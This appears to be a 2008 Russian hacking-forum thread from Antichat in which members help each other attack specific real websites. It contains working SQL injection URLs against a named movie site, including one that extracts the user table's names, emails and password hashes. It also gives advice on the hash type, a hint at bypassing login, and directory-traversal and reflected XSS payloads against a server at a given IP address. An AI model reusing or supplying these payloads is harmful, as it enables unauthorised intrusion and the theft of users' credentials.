HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.09.2008, 05:26
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами: 9796693

Репутация: 659


По умолчанию

Помогите раскрутить баг:
http://www.mymovie.in.ua/film_info.php?film_id=323
http://www.mymovie.in.ua/film_info.php?film_id=324-1
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/UNION/**/SELECT/**/1,2,3/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/4/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/3/*
Не получается подобрать число полей, по GROUP BY получается что должно быть 3 поля, но нет.
 
Ответить с цитированием

  #2  
Старый 23.09.2008, 07:08
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

Код:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+version()/*
 
Ответить с цитированием

  #3  
Старый 23.09.2008, 07:49
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами: 9796693

Репутация: 659


По умолчанию

Благодарю, krypt3r за помощь

Нашел таблицу юзеров:
Код:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+concat(name,0x3a,email,0x3a,pass)+from+user/*
Жаль, алгоритм хеширования не из числа популярных
 
Ответить с цитированием

  #4  
Старый 23.09.2008, 08:28
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
С нами: 9718355

Репутация: 310
По умолчанию

MySQL_64bit
 
Ответить с цитированием

  #5  
Старый 23.09.2008, 10:37
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

diehard, хэши - это хорошо =) Там, кстати, можно и без пароля зайти))
ЗЫ. Алгоритм хэширования - MySQL4 aka OLD_PASSWORD в пятом мускуле
 
Ответить с цитированием

  #6  
Старый 24.09.2008, 03:59
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat

Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?
 
Ответить с цитированием

  #7  
Старый 24.09.2008, 04:10
Gema
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами: 9286645

Репутация: 73
По умолчанию

Цитата:
Сообщение от Nightmarе  
Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat

Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?

Можно делать листинг путем команд в переменной

пример http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/../
 
Ответить с цитированием

  #8  
Старый 24.09.2008, 04:15
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Во спасибо большое!
Но вообще я так понял ничё серьёзного???

Последний раз редактировалось Nightmarе; 24.09.2008 в 04:18..
 
Ответить с цитированием

  #9  
Старый 24.09.2008, 04:21
Gema
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами: 9286645

Репутация: 73
По умолчанию

Цитата:
Сообщение от Nightmarе  
Во спасибо большое!
Но вообще я так понял ничё серьёзного???
в принципе да.

держи еще xss пассив =)

http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=%3Cscript%3Ealert(%22111%2 2)%3C/script%3E
 
Ответить с цитированием

  #10  
Старый 25.09.2008, 00:15
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
С нами: 9283286

Репутация: 1
По умолчанию

http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?

Последний раз редактировалось IND1G0; 25.09.2008 в 00:35..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.